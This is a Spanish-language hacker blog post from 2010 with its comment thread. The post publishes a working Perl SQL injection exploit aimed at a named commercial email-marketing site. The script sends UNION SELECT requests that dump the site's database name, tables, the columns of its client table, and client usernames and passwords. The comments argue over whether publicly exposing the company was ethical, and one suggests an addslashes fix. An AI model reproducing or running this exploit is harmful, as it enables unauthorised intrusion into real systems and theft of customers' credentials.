Autor: Molder Fecha:24 Jun 2010
Aquí unas pruebas de SQL INJECTION a un sitio construido en PHP y MYSQL llamado WebGloob que se dedica envío de campañas publicitarias, boletines o avisos, por medio de email marketing.
La sección vulnerable se encuentra en http://www.webgloob.com/noticia.php?id_noticia=3819.
Aquí pongo una prueba de la vulnerabilidad, donde obtenemos el nombre de la base de datos (id_noticia=-1 UNION select 1,2,3,database(),5,6).
Y publicamos el exploit para obtener todas las tablas, usuarios y contraseñas de clientes.
#!/usr/bin/perl
#Powered by Sombrero de paja Molder
#24 Junio 2010
#Exploit sql inyection WebGloob
#Aztlan Hack I. S. T. http://www.aztlan-hack.org
use IO::Socket;
$host = "www.webgloob.com";
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => "$host",
PeerPort => "http(80)",
);
unless ($remote) { die "[+] No se puede conectar al host $host \n" }
$remote->autoflush(1);
print $remote "GET /noticia.php?id_noticia=-1+union+select+1,2,3,database(),5,6 HTTP/1.1\nHOST: ".$host."\n\n";
print "[+] Obteniendo Base de datos:\n";
while(<$remote>)
{
$linea = $_;
if ($linea=~/(imagenjpeg.php\?ruta=3&ancho=300&alto=300" alt="(.*?)" border="0")/i )
{
print $2."\n";
}
}
print "\n\n";
print "[+] Obteniendo Todas las tablas del servidor xD...:\n";
for($x=1;$x <=100; $x++)
{
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => "$host",
PeerPort => "http(80)",
);
unless ($remote) { die "[+] No se puede conectar al host $host \n" }
$remote->autoflush(1);
print $remote "GET /noticia.php?id_noticia=-1+union+select+1,2,3,table_name,5,6+from+information_schema.tables+limit+".$x.",1 HTTP/1.1\nHOST: ".$host."\n\n";
$dato = "";
while(<$remote>)
{
$linea = $_;
if ($linea=~/(imagenjpeg.php\?ruta=3&ancho=300&alto=300" alt="(.*?)" border="0")/i )
{
$dato = $2;
print $dato."\n";
}
}
if($dato eq "")
{
$x=100;
}
}
print "\n\n";
print "[+] Obteniendo Todas las columnas de la tabla clientes xD...:\n";
for($x=0;$x <=100; $x++)
{
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => "$host",
PeerPort => "http(80)",
);
unless ($remote) { die "[+] No se puede conectar al host $host \n" }
$remote->autoflush(1);
print $remote "GET /noticia.php?id_noticia=-1+union+select+1,2,3,column_name,5,6+FROM+information_schema.columns+WHERE+table_name=char(99,108,105,101,110,116,101,115)+limit+".$x.",1 HTTP/1.1\nHOST: ".$host."\n\n";
$dato = "";
while(<$remote>)
{
$linea = $_;
if ($linea=~/(imagenjpeg.php\?ruta=3&ancho=300&alto=300" alt="(.*?)" border="0")/i )
{
$dato = $2;
print $dato."\n";
}
}
if($dato eq "")
{
$x=100;
}
}
print "\n\n";
print "[+] Obteniendo Usuarios y passwords LOL...:\n";
for($x=0;$x <=1000; $x++)
{
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => "$host",
PeerPort => "http(80)",
);
unless ($remote) { die "[+] No se puede conectar al host $host \n" }
$remote->autoflush(1);
print $remote "GET /noticia.php?id_noticia=-1+union+select+1,2,3,concat(usuario,char(58),password)+as+user,5,6+FROM+clientes+limit+".$x.",1 HTTP/1.1\nHOST: ".$host."\n\n";
$dato = "";
while(<$remote>)
{
$linea = $_;
if ($linea=~/(imagenjpeg.php\?ruta=3&ancho=300&alto=300" alt="(.*?)" border="0")/i )
{
$dato = $2;
print $dato."\n";
}
}
if($dato eq "")
{
$x=1000;
}
}
print "\n\n";
print "[+] Fin del programa\n";
Happy Hack!!
Comentarios
|
juan
|
Comentario: mira te pido que saques eso de linea
como personas como tu esta el mundo.
mejor ponte atrabajar y utilizar esa mente para cosas buenas y no destructivas.
|
|
Publicado: 06 Jul 2010
|
|
|
Comentario: Yo solo expongo la clase de sistemas que tenemos en Mexico, toca a las empresas poner atencion en la gente que contratan para crear, mantener y proteger sus aplicaciones.
Pero la mayoria somos de "Funciona?, entonces asi lo dejo.", sin pensar en todos los peligros y vulnerabilidades que podemos tener.
Yo no hago daño, yo solo enseño y comparto. La libertad de la informacion no es un delito y enseñar con un sistema inseguro tampoko lo es.
PD: Si eres el afectado contactame y mejor te enseño como corregir tu problema.
PD2: SI trabajo.
PD3: Por gente como yo tenemos "UN PAIS MAS SEGURO" y por gente que piensa como tu tenemos un pais con sistemas inseguros.
Salu2. |
|
Publicado: 06 Jul 2010
|
|
none
|
Comentario: mira esro no se trata de si es seguro o no el tema es que tu esta propiciando a que otro prueben para saber si es vulnerable o no y estas ocasionando un daño terrible en esto.
y te agradesco tu ofrecimiento te enseñarme como arreglarlo pero por obvias razones y por el tipo de contestaciones que das no confiaria ni n segundo en tu profecionalidad.
en vez de poner ejemplos si un sitio es vulnerable o no por que no enseñas mejor como hacer un mejro sitio y no poner como ejemplos aotras empresas que ponen todo su esfuerzo dia a dia por crecer y no crecer de otros como tu.
pero bueno no me voya poner a la par contigo,por que esto no es un puesto de verduras!!
y por cierto ya se quien eres y no eres nada profecional con lo que estas haciendo.tu sabes a que me refiero
lo unico que te digo es que dejas mucho que decear y si te lo vuelvo a decri ponte a trabajar por el bien no por el mal.
si tienes otro trabajo segun tu por que haces este tipo de cosas cual es el fin de lo bueno por que de plano a mi no me causas nada bueno.
y si soy el director general!! eso no tengas dudas.
que tengas exito en tus proyectos eso es mi deceo pero no con el sacrificio de otros.
no gastes en contestar otra vez el mensaje por que ya no revisare esto para mi no eres importante solo estoy dusgustado por que veo que mexico en algunas personas sigue existiendo gente estafadora ,engañosa y por eso no evolucionamos. |
|
Publicado: 06 Jul 2010
|
|
|
Comentario: ok. Entonces como empresa que busca crecer cada dia arregla tus problemas de seguridad por que pones en riesgo a tus clientes.
Por cierto ponte a pensar, si la web se dedicara a "Hacer el mal creeme que tu pagina de la red apareceria con un "index" diciendo algo como "HACKED BY MOLDER" y tu sistema borrado, sin embargo no paso nada de eso, todo lo contrario tubiste un testing gratuito sobre tu sistema.
Y la publicacion te obliga a corregirlo por k si no seguro k asi lo dejas.
PD: TU sabes kien soy?. que bien por k yo no tengo la menor idea de quien eres.
PD2: Siento lo de mis contestaciones. aun k no veo ningun insulto ni exaltacion del Ego.
PD3: Dile a tus programadores que filtren las variables GET, POST, COOKIE, y las cabeceras HTTP que ouedan utilizar.
Ejemplo:
<?php
if(!get_magic_quotes_gpc())
{
$variable = addslashes($_GET["variable"]);
}
?> |
|
Publicado: 07 Jul 2010
|
|
morgan
|
Comentario: Imaginate que clase de director eres que ni siquiera sabe escribir bien, aqui unos ejemplos de lo que escribiste: "te agradesco tu ofrecimiento" se escribe: "te agradezco tu ofrecimiento"
otro ejemplo " por el tipo de contestaciones que das no confiaria ni n segundo en tu profecionalidad " se escribe: "por el tipo de contestaciones que das no confiaria ni un segundo en tu profesionalidad" , la verdad dudo mucho de tus conocimientos y la verdad si se les fue la seguridad en el desarrollo, mejor usa la solución que te estan dando y fue gratis.
Saludos y suerte señor Director
" |
|
Publicado: 07 Jul 2010
|
|
DH
|
Comentario: Señor "PROFECIONAL" o "none": Desde tu forma de expresarte me puedo dar cuenta de que no te acercas siquiera al puesto supuestamente directivo el cual dices desempeñar. Sin embargo, estos tipos de investigación lo único que nos dejan a todos es un gran aprendizaje. Deberías tomar en cuenta este tipo de enseñanzas para proteger tus desarrollos (porque asumo que eres el desarrollador). MOLDER es uno de los mejores investigadores que he leído en la web y tenemos mucho que aprender de expertos como el. No te ardas viejo, mejor dedicate a "parchar" tu muy seguro y "PROFECIONAL"(profesional) desarrollo. Te "DECEO"(deseo) un buen HACKING!!!
|
|
Publicado: 07 Jul 2010
|
|
sin comentarios
|
| Comentario: sin comentarios |
|
Publicado: 07 Jul 2010
|
|
NONE
|
| Comentario: que porqueria de seres humanos son ,mueran todos lo hackers y dejen de estar molestando |
|
Publicado: 07 Jul 2010
|
|
|
Comentario: Se les ofrecio ayuda y miren con lo que salen.
http://www.aztlan-hack.org/index.php?command=1003¬icia=Ardillas-WebGloob-Solo-busca-venganza |
|
Publicado: 09 Jul 2010
|
|
Lic. Samantha Sánchez/Webgloob.com
|
Comentario: Comentario: Me parece que la forma en la que tú supuestamente brindas la ayuda no tendria que ser exponiendo publicamente nuestro error, ya que primeramente webgloo en ningún momento solicito tus servicios, segundo punto quien te autorizo usar el logo, marca de webgloob.
Donde queda tu etica profesional, asi es como tu trabajas primero expones los errores de las páginas publicamente y después los ayudas.
Lo más ético y si hubieras querido hacer las cosas bien, era contactarme primero, brindandome tus servicios, comentarios, posteriormente pedirme autorización para utilizar mi información confidencial y hacerla publica, hacer uso de mi marca y logo registrado. Porque si sabes que para hacer uso de marcas y logos hay que tener autorización por el propietario de la misma.
Como bien lo dijo Benito Juárez Garcia: "El respeto al derecho ajeno es la paz".
|
|
Publicado: 09 Jul 2010
|
|
ul
|
Comentario: Entiendo tu postura, cuando nos dicen nuestros errores duele y mas si es público, y algo que te preocupa es tu marca, que sea manchada por sus errores, pero mi punto de vista, es que las personas que leen en este blog, lo menos que les interesa es tu marca, si no en donde fue el error para que no les ocurra lo mismo en sus sistemas que generan, preocupate si aparece tu marca en www.apestan.com donde se puede publicar de malos servicios y quejas de las empresas (no se pide permiso para publicarla).
En este caso se hizo publico no para atacar a su marca si no se tomo de ejemplo, a mi me hubiera gustado que en su comentario hubieran expuesto, YA CORREGIMOS EL ERROR HACIENDO ESTO, y así aprender todos, que es el objetivo de este blog.
Pero digo cada quien piensa distinto.
|
|
Publicado: 09 Jul 2010
|
|
Dr. N4sh
|
Comentario: Molder, dejalo asi compañero, como tu decias decir que algo es inseguro no es un delito, y si ellos no quieres apreciar la ayuda gratis y arreglar sus sistemas, aya ellos.
Pero bueno, tu sabes amigo, que eso tiene un costo $ como decia aya ellos si no haceptan tu ayuda amigo.
La mayoria de los administradores, cuando reportas un bug en sus sistemas, o se molestan o amenazan con demandarte por intrusion, pero me he dado cuenta que es por falta de razonamiento y sobre todo por envia,
Saludos paisa, te dejo un abrazo hermano. |
|
Publicado: 21 Jul 2010
|
|
